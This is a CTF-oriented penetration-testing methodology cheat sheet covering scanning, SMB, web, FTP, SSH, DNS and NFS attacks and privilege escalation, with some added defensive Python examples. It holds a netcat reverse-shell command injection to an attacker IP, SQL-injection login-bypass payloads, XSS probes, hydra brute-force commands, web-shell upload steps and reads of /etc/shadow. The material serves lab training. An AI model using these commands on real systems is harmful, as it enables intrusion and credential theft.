HackFlow the Process

Documenting the process

more at apt-secure.ca

How to Use HackFlow


General Data:

  • wordlists: /usr/share/wordlists

  • python script for determining use of random port assignments link

  • the command below will scan ALL open ports on a system. It is not stealthy. It is straight from HTB. I would not use it in a professional setting, but in a CTF it's fine. The (-p-) switch will take a long time even with -T4

    • ports=$(nmap -p- --min-rate=1000 -T4 <IP> | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

    • #nmap -sC -sV -p$ports <IP>

  • Power Usage nmap:

    • searching for vulns for particular service

      • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

      • followed by

      • #nmap -p 139 --script smb* <IP> -oN <outputfilename>.txt

  • Finding files on target

    • #find / -name <filename_and_extension> 2>/dev/null

    • #find /home/ -type f -size 1033c -name "file_name.*"

  • #find / -type f -user root

  • #find / -type f -group root

  • read file with "-" at beginning

    • #cat < file.txt
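The two-stage scan in the General Data list (collect the port numbers, then rescan them with -sC -sV) is just text processing over nmap's output. Here is that step written out in Python as an added example, not part of HackFlow, over constructed sample output. By default it keeps only ports reported open; passing `states=None` reproduces the shell pipeline's behaviour of keeping every port line, filtered ones included.

```python
"""Parse nmap normal output into the comma-separated port list that the
two-stage scan in the General Data section builds with grep/cut/tr/sed.
Added example, not part of HackFlow."""
import re

# Matches port lines in nmap's normal (-oN / stdout) output, e.g.
# "22/tcp  open  ssh" or "8080/tcp filtered http-proxy".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S*)")

# Constructed sample of nmap output (not a real scan result).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.10.10.10
Host is up (0.012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
8080/tcp filtered http-proxy

Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
"""


def parse_ports(nmap_output, states=("open",)):
    """Return the ports whose state is in `states`, as a sorted list of ints.

    The shell pipeline in the original keeps every line that starts with a
    digit, so filtered ports get re-scanned too; pass states=None to mimic that.
    """
    ports = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, _proto, state, _service = m.groups()
        if states is None or state in states:
            ports.append(int(port))
    return sorted(set(ports))


def ports_argument(nmap_output, states=("open",)):
    """Join the parsed ports the way nmap expects them for -p, e.g. '22,80,139,445'."""
    return ",".join(str(p) for p in parse_ports(nmap_output, states))


if __name__ == "__main__":
    print(ports_argument(SAMPLE_NMAP_OUTPUT))        # 22,80,139,445
    print(ports_argument(SAMPLE_NMAP_OUTPUT, None))  # 22,80,139,445,8080
```

Feeding the real scan is a matter of `ports_argument(open("scan.txt").read())`; the `-oN` file and stdout share the same line format.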

Beginning of Hack Flow

  • VPN on?

  • Have you switched VPN locations?

  • are you using proxychains? link1 link2 link3

  • ping target

    • yes: continue

    • no: check connection

      • try port scans with -sA; experiment with -Pn and -n

      • go back and check network

      • be aware that you may still have a connection; a FW could be dropping ICMP packets

Initial Interaction

  • Consider adding target IP to /etc/hosts for expedited work (so you are not typing the IP address in a ton)

    • see image below

  • #nmap -sS -T4 target

    • save results. I do this first to get a general idea of what I am looking at

  • #nmap -sV -sC target

    • grab service versions and any initial default script output

  • #nmap -sV --script vulners.nse target

    • this can come back with a ton of information. It can feel like a shotgun approach; however, it can provide good direction

    • output can be large --> recommended to write output to a file (-oN)

  • #nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <IP>

  • Leverage the entire vuln database of nmap

    • #nmap --script vuln <IP>

    • /usr/share/nmap/scripts/script.db --> a local DB that lists all the vulnerability checks and exploit scripts (scans) available to nmap

    • see "General Data" for power usage

Add IP to /etc/hosts so you can use a given name in your pentest


  • from the nmap scan you have open:

    • 139/445 netbios-ssn

    • 445/1433 typically associated with file sharing (SMB)

    • get version

  • Attempt a mapping first

    • #smbmap -H <IP>

    • try this as well. "0xdf" sends an error code

      • #smbmap -H a.htb -u "0xdf" -p "0xdf"

  • Gather more information with enum4linux

    • #enum4linux -a target_ip

  • Check for remote shares

    • #smbclient -L //target_ip

      • if it shows you shares, this is good!

  • Check anonymous access

    • #smbclient -N -L \\\\IP\\

      • anonymous allowed?

        • yes

          • look at the files and pick one; do this for all of them (e.g. backups)

            • #smbclient -N \\\\IP\\backups

            • #smbclient -N //<IP>/<share_name>

              • can you connect to the share?

                • yes

                  • attempt reverse shell

                  • set up listener on attacker #nc -nlvp 4444

                  • while connected to smb --> #logon "/=`nc <attacker IP> 4444 -e /bin/bash`"

    • Leverage nmap to grab potential exploits

      • #nmap -p 445 --script vuln a.htb


General SAMBA


Fix: your client may not be set up to work with older SMB versions; allow it to do so.

Add the line shown above to /etc/samba/smb.conf


  • No matter what web application you are working with, go and find the default credentials and try them out

  • Look at the page source --> does anything jump out?

  • Conduct information gathering

    • click on everything and observe changes in the URL.

    • modify the URL and see if anything changes.

  • you have a port open: open a browser and enter IP:port

  • navigate around to all pages

  • insert a single quote in forms to see if it is trivially ("easy") vulnerable to SQL injection

  • append "/sites/" to the end of the IP to see if anything shows up

  • in terminal run

    • #whatweb target.url --> this tells you the technologies/services associated with the site

  • #nikto -h target_ip

    • put the header info into Google: "<header_info> cve"

  • webcontent scanner DIRB

    • #dirb http://xyz.com -r -z 10

      • -r = non recursive

      • -z = 10 millisecond delay

  • Directory brute force gobuster

    • cheat sheet link

    • after you discover directories put the new data into URL and click on everything

    • use different wordlists (/usr/share/wordlists); download more if needed

    • #gobuster dir -u http://<target> -w /usr/share/wordlists/common.txt -t 100

      • wordlists that have worked (take note that this is brute force, so the size of the file increases the options attempted)

        • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

        • /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

      • additional switches to add (being specific can help you discover exposed directories faster; if you know that PHP is present, run the command below!)

        • #gobuster dir -u http://<target> -w /usr/share/wordlists/common.txt -e -s "200,301,302,401" -x "php" -t 100

          • -x specifies extensions

          • -s status codes to report (positive list)

          • -e expanded mode: prints the full URL

  • Test for WebDAV (link): WebDAV is an extension of HTTP that allows clients to perform remote web content authoring.

    • run this scan

    • #nmap --script http-webdav-scan -p80,8080 a.htb

    • using metasploit

      • #use scanner/http/webdav_scanner

        • #set rhosts

        • #set path

        • #run

    • run davtest (tests to see what kinds of files can be uploaded)

      • #davtest -url http://<IP> (davtest can be wonky; however, if your scanner returned positive for WebDAV it's worth further digging)

      • #cadaver <ip> (a command line WebDAV editor)

        • commands (ls/cd/get/mget/put/mput)

        • access gained?

          • yes

      • You can use curl to upload files to a site with a vulnerable WebDAV setup (link)

Testing User Inputs

  • Try manual testing SQL injections (see below)

  • open up "inspect element">network>click submit button with data in fields >observe any changes

  • manually testing inputs is the first step, but it could be time to use Burp Suite

  • open Burp Suite > start the proxy browser (intercept on) > step through the website and observe changes (link)

    • does the POST carry base64 data?

  • Test Command Injection

    • PHP may be running in the background

    • try putting a ; at the end of known-good input followed by a command, e.g. ;whoami

      • without proper sanitization you can potentially be shown data you shouldn't see

        • #cat /etc/passwd

        • #cat /etc/shadow

        • #ls /

  • Test Stored XSS Vuln

    • Use JavaScript special characters to see if you can cause an error, or test whether they are allowed, which means we could be looking at an XSS

      • ";<>

      • "

      • <

      • >

      • ;

      • also

      • <script>alert('XSS')</script>

  • Cookie Forgery

    • You could have an opportunity for Cookie forgery. Follow video link for BASIC cookie session forgery
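The characters the checklist probes with are exactly the ones that output encoding has to neutralise. The following is an added example, not part of HackFlow: it renders a stored comment with and without `html.escape` and parses the result to show whether a `<script>` element survives into the page. The comment wrapper and the probe strings are constructed.

```python
"""Stored XSS comes down to output encoding: the characters the checklist
probes with (" ' < > ; &) must be escaped when untrusted text is written
into HTML. Added example, not part of HackFlow."""
import html
from html.parser import HTMLParser

# The probe strings from the checklist (constructed list, same characters).
PROBES = ['";<>', '"', '<', '>', ';', "<script>alert('XSS')</script>"]


def render_comment_vulnerable(comment):
    """Interpolates stored user text straight into the page."""
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment):
    """html.escape with quote=True also escapes quotes, so it is safe for
    attribute values as well as element text."""
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


class TagCollector(HTMLParser):
    """Records every start tag the browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(rendered):
    """Return the list of element names parsed out of a rendered fragment."""
    parser = TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags


def probe_survives(render, probe="<script>alert('XSS')</script>"):
    """True if rendering the probe yields a <script> element."""
    return "script" in tags_in(render(probe))


if __name__ == "__main__":
    for probe in PROBES:
        print(repr(probe), "->", render_comment_safe(probe))
    print("vulnerable renders <script>:", probe_survives(render_comment_vulnerable))
    print("safe renders <script>:     ", probe_survives(render_comment_safe))
```

The parser check is the useful part: a filter that merely strips the literal string `<script>` can be bypassed by case or nesting tricks, whereas escaping every `<` means the parser never sees a tag at all.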

Access Gained

What is in /var/www? Does your current user have control of this directory? Can you upload anything that could escalate privileges?

  • consider the python httpserver in tools

  • check permissions #ls -la

  • do local enumeration (Linux/Windows): which binaries run at an admin level?

WEBAPP (SQL Injections)

Manual Checking

  • open firefox

  • right click submit button>inspect element

    • network>All>form data

    • document the format for the form

    • attempt brute force

    • #hydra -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:invalid"

Manual Testing (both user/pass, user only, pass only) link

Login Bypass

  • admin' --

  • admin' -- -

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--

  • user' or 1=1;#

  • user' or 1=1 LIMIT 1;#

  • user' or 1=1 LIMIT 0,1;#
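Why these strings work, and what stops them, as an added example that is not part of HackFlow: a login check that concatenates the username into the SQL, beside one that binds it as a parameter, both run against a constructed in-memory SQLite table. SQLite honours the `--` comment form used in the list above; the `#` variants are MySQL syntax and would be a syntax error here.

```python
"""A login check built by string concatenation next to a parameterised one,
run against an in-memory SQLite table. Added example, not part of HackFlow."""
import hashlib
import sqlite3


def make_db():
    """Constructed sample users table; the stored hash is of 'S3cret!'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.sha256(b"S3cret!").hexdigest()))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the WHERE clause from raw input. With username "admin' --"
    everything after the comment marker, including the password check,
    is discarded; with "' or 1=1--" the predicate is always true."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND pw_hash = '%s'" % (username, pw_hash))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Bound parameters: the input is always data, never SQL syntax, so the
    same strings simply fail to match any username."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user in ("admin", "admin' --", "' or 1=1--"):
        print("%-12r vulnerable=%-6r safe=%r" % (
            user, login_vulnerable(db, user, "wrong"), login_safe(db, user, "wrong")))
```

The hardened version needs no blacklist of quote characters: the driver sends the query text and the values separately, so there is nothing for a quote to terminate.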

Finding Command Execution

  • you have found a form that sends a command.

    • is target OS Linux?

      • yes

        • stack a command onto the end of an expected command

          • put a ";" (semicolon) at the end of the command followed by "whoami" and see what happens
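The semicolon trick described here and under "Test Command Injection" above works because the application hands user input to a shell. As an added example, not part of HackFlow, this shows a vulnerable handler next to its hardened form. `echo` stands in for the `ping`-style command such a form would normally run, and the injected string only echoes a marker, so the demonstration is harmless and runs offline; the allow-list check and the function names are my own.

```python
"""A form handler that passes user input to a shell, beside the hardened
version. `echo` stands in for the real command so this runs anywhere.
Added example, not part of HackFlow."""
import ipaddress
import subprocess


def ping_vulnerable(host):
    """Concatenates input into a shell command line (shell=True), so a ';'
    in the input ends the intended command and starts a new one."""
    result = subprocess.run("echo " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def is_valid_host(host):
    """Allow-list check: accept only a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def ping_hardened(host):
    """Validate first, then pass argv as a list so no shell ever parses it."""
    if not is_valid_host(host):
        raise ValueError("rejected host: %r" % host)
    result = subprocess.run(["echo", host], capture_output=True, text=True)
    return result.stdout


def echo_literal(host):
    """Even without validation, list-form argv treats ';' as plain text:
    the whole string reaches echo as one argument."""
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


def hardened_rejects(host):
    """True if the hardened handler refuses the input before running anything."""
    try:
        ping_hardened(host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable:", repr(ping_vulnerable(payload)))   # second command ran
    print("argv list: ", repr(echo_literal(payload)))      # literal text only
    print("hardened rejects payload:", hardened_rejects(payload))
```

Both layers matter: the argv list removes the shell from the path, and the allow-list keeps arguments such as `-f` or an unexpected hostname from reaching the real command.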

terminal in browser

  • grab list of any/all users

    • #cat /etc/passwd

      • you may need to switch users

  • depending on user permissions

    • get python version

      • $whereis python

    • poke around for user flag

    • run #sudo -l (this lists the commands you can run with sudo)

    • attempt Python priv escalation from the terminal (link)

    • be aware that more is available to you with an upgraded shell; here are instructions to upgrade your shell using Python (link)


  • general connect (banner grabbing): you can find out the service version easily

    • #ftp <IPADDR>

  • test anonymous login link

    • This will feed you directory listings.

      • #nmap -sV -sC <IPADDR> -p21

  • Try to login

    • #ftp <IPADDR> 21

      • use some default creds like

        • anonymous/anonymous

        • admin/admin

        • root/root

        • empty/empty

        • Anonymous allowed?

          • yes (follow these steps, or continue down to "Access Gained")

            • examine all available files for critical info (creds)

            • use #ls -la to determine if you have c:/ access (windows)

            • Do you have C:/ access?

              • yes

                • continue to FTP Priv Escalation

          • no

            • you can attempt brute force

  • metasploit anonymous login check link

  • ftp brute force


Access Gained:

  • this means that you are either able to log in with acquired user credentials or can navigate as anonymous

  • The FTP server may have nothing of value; however, depending on what is in there, you may want to consider uploading a file (like a web shell)

    • video demo

    • asp.net present

    • from attacker (method 1)

      • #locate cmd.aspx

      • #cp <path/file> <wherever_you_want_it>

      • connect with ftp

      • #put <file>

      • open browser on attacker

        • http://<IP>/<file you put>

        • worked?

          • yes

    • method 2 (upload reverse shell aspx)

      • follow link for instructions link


general ftp

client side commands link


Brute Force

  • #hydra -s 2222 -l <username> -P <path to wordlist> <IP> -t 4 ssh

    • -l = single user name

      • -L = to use word list for user names

    • -P = path to wordlist

    • -t 4 = number of threads (brute force can take a long time, so leverage your resources)

    • -s = change the port (not all SSH is on 22; hydra's default is 22)
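What the hydra run above looks like from the target's side, as an added example that is not part of HackFlow: a detector that parses sshd "Failed password" lines and flags any source address exceeding four failures inside a sliding 60-second window. The log lines are constructed, and the year is an assumption because syslog timestamps carry none.

```python
"""Detection side of an SSH brute force: count failed logins per source
address in a sliding window over sshd log lines and flag bursts.
Added example, not part of HackFlow; the log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# auth.log / journal style sshd lines (constructed, not from a real host).
SAMPLE_AUTH_LOG = """\
Mar 14 10:00:01 web01 sshd[2011]: Failed password for invalid user oracle from 198.51.100.7 port 40122 ssh2
Mar 14 10:00:02 web01 sshd[2013]: Failed password for root from 198.51.100.7 port 40124 ssh2
Mar 14 10:00:02 web01 sshd[2015]: Failed password for invalid user test from 198.51.100.7 port 40126 ssh2
Mar 14 10:00:03 web01 sshd[2017]: Failed password for admin from 198.51.100.7 port 40128 ssh2
Mar 14 10:00:04 web01 sshd[2019]: Failed password for root from 198.51.100.7 port 40130 ssh2
Mar 14 10:00:05 web01 sshd[2021]: Accepted publickey for deploy from 203.0.113.5 port 51000 ssh2
Mar 14 10:03:10 web01 sshd[2030]: Failed password for deploy from 203.0.113.5 port 51002 ssh2
Mar 14 10:09:10 web01 sshd[2040]: Failed password for deploy from 203.0.113.5 port 51004 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_failures(log_text, year=2024):
    """Return (timestamp, ip, user) for each failed-password line.
    `year` is assumed: syslog timestamps do not include one."""
    out = []
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            out.append((ts, m.group("ip"), m.group("user")))
    return out


def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Return {ip: (peak_count, usernames_tried)} for sources that reach
    `threshold` failures within any `window_seconds` span. A user who
    mistypes a password a couple of times over several minutes never
    accumulates enough events inside one window to alert."""
    per_ip = defaultdict(deque)
    alerts = {}
    for ts, ip, user in parse_failures(log_text):
        q = per_ip[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            users = sorted({u for _, u in q})
            peak = max(len(q), alerts.get(ip, (0, []))[0])
            alerts[ip] = (peak, users)
    return alerts


if __name__ == "__main__":
    for ip, (count, users) in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print("ALERT %s: %d failures, users tried: %s" % (ip, count, ", ".join(users)))
```

The username spread is the second signal worth keeping: a wordlist run such as `-L <user_wordlist>` shows up as many distinct names from one address, which a single locked-out user never produces.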

Access Gained Now Privilege Escalation:

  • run commands

    • check if you can sudo

      • #sudo -l

        • This lists the commands you can run with sudo, which can lead to escalation

      • #echo $PATH

      • get OS info

        • #(cat /proc/version || uname -a ) 2>/dev/null

      • get ENV variables (they can contain API keys)

        • #(env || set) 2>/dev/null

      • examine file capabilities (start at the root "/")

        • #getcap -r / 2>/dev/null

          • if you find a binary with cap_setuid, go here

Local Enumeration


  • CVE-2006-3392

  • get users

    • #net users

  • get hostname

    • #hostname

  • look at user specific details (Are any users included in the admin group)

    • #net user <username>

  • look at networking (interfaces,routing table etc.)

    • #ipconfig /all

    • #route print

  • look at arp cache

    • #arp -a

  • look at network connections and firewall rules

    • #netstat -ano

    • #netsh firewall show state

  • Look at scheduled tasks (may need elevated permissions)

    • #schtasks /query /fo LIST /v

  • Map running processes to started services

    • #tasklist /SVC

  • look at systeminfo.exe

    • check out this page for power usage link

    • What kind of things are we looking for?

      • patches

      • OS Version

      • Original install time

      • BIOS Version

      • network cards (pivots)

  • Determine .NET versions

    • #reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

    • Can also look up directories

      • #cd c:\Windows\Microsoft.NET\Framework

      • #dir

  • Find third party drivers

    • #driverquery /v


  • important commands

    • whoami/id/hostname/uname/pwd/ifconfig/ip/netstat/ss/ps/who/env/lsblk/lsusb/lsof/lspci/hostname

  • print system info

    • #uname -a

  • kernel release

    • #uname -r

  • find users with group "0"

    • #grep 'x:0:' /etc/passwd (matches the UID field, so this lists root-equivalent accounts)

  • look at scheduled tasks

    • #crontab -l


  • #cat ~/.bash_history

  • #cat /etc/passwd

  • #cat /etc/shadow

"find" Power Usage

  • #find / -name <filename_and_extension> 2>/dev/null

  • #find -type f -name "*.bak" 2>/dev/null

  • #find -type f -name "*.log" 2>/dev/null

find SUID binary

SUID binary exploitation involves a binary with its SUID bit set, so that anything executed by the program runs with the privileges of the file's owner

  • #find / -perm -4000 2>/dev/null
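The SUID search above, as an added Python example that is not part of HackFlow: it walks a tree, keeps regular files with the setuid bit set, and diffs the result against a baseline so that a newly appeared setuid binary stands out. The demo builds a constructed tree in a temporary directory; the baseline list in the test is constructed too.

```python
"""What `find / -perm -4000` does, with a baseline diff on top: walk a tree,
collect regular files with the setuid bit and report any not on a
known-good list. Added example, not part of HackFlow."""
import os
import stat
import tempfile


def find_suid(root):
    """Return sorted paths of regular files under `root` with S_ISUID set.
    Unreadable directories are skipped, like `2>/dev/null` in the one-liner;
    lstat is used so symlinks are not followed."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def new_suid_binaries(found, baseline):
    """Entries present now but absent from the baseline: what a reviewer
    should look at first after a package change or a suspected compromise."""
    return sorted(set(found) - set(baseline))


def demo():
    """Constructed tree in a temp dir: one setuid file, one plain file.
    Returns the basenames find_suid reports (setting the bit on a file you
    own needs no privileges)."""
    with tempfile.TemporaryDirectory() as tmp:
        suid = os.path.join(tmp, "bin", "suid_tool")
        plain = os.path.join(tmp, "bin", "plain_tool")
        os.makedirs(os.path.dirname(suid))
        for path in (suid, plain):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(suid, 0o4755)
        os.chmod(plain, 0o755)
        return [os.path.basename(p) for p in find_suid(tmp)]


if __name__ == "__main__":
    print("setuid files in demo tree:", demo())
    # Real use: find_suid("/") against a baseline captured at build time.
```

Capturing the baseline once from a freshly built host and re-running the diff on a schedule turns the one-liner from a privilege-escalation probe into an integrity check.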


reference link

initial interaction

We want to find information like domain.

is DNS running TCP or UDP? (TCP is an oopsie doopsie)

banner grab

  • #nmap -sSU -p 53 --script dns-nsid a.htb

Domain info gathering

  • #nslookup

  • #server <IP>

  • #<IP>

zone transfer (add the domain to /etc/hosts)

  • #dig axfr @<IP> <domain name>

    • if the zone transfer works

      • add new nameservers to your /etc/hosts

      • subdomain brute force

        • #gobuster dns -d <domain name> -w /usr/share/wordlists/all_dns.txt -t 100

          • huge subdomain list can be found here link

          • DNS SecLists link (I use bitquark-subdomains-top100000.txt)

other nmap

  • #nmap --script fcrdns <IP>

  • #nmap --script dns-srv-enum <IP>

  • #nmap --script dns-random-txid <IP>

  • #nmap --script dns-random-srcport <IP>


  • link showing early steps (including steps below for RPC)

    • follow the link above for instructions on grabbing /etc/passwd and /etc/shadow and using JtR to crack passwords

    • additionally there are further instructions on adding yourself to sudoers (priv escalation)

  • RPC Bind Hack (potentially port 111)

    • #nmap -p111 --script nfs* <IP>

    • Do you see a mount point?

      • yes

        • make a directory: #mkdir myDemo

        • #sudo mount -o nolock <IP>:<mount_point> <location_of_myDemo>

        • if successful, you can now navigate to this share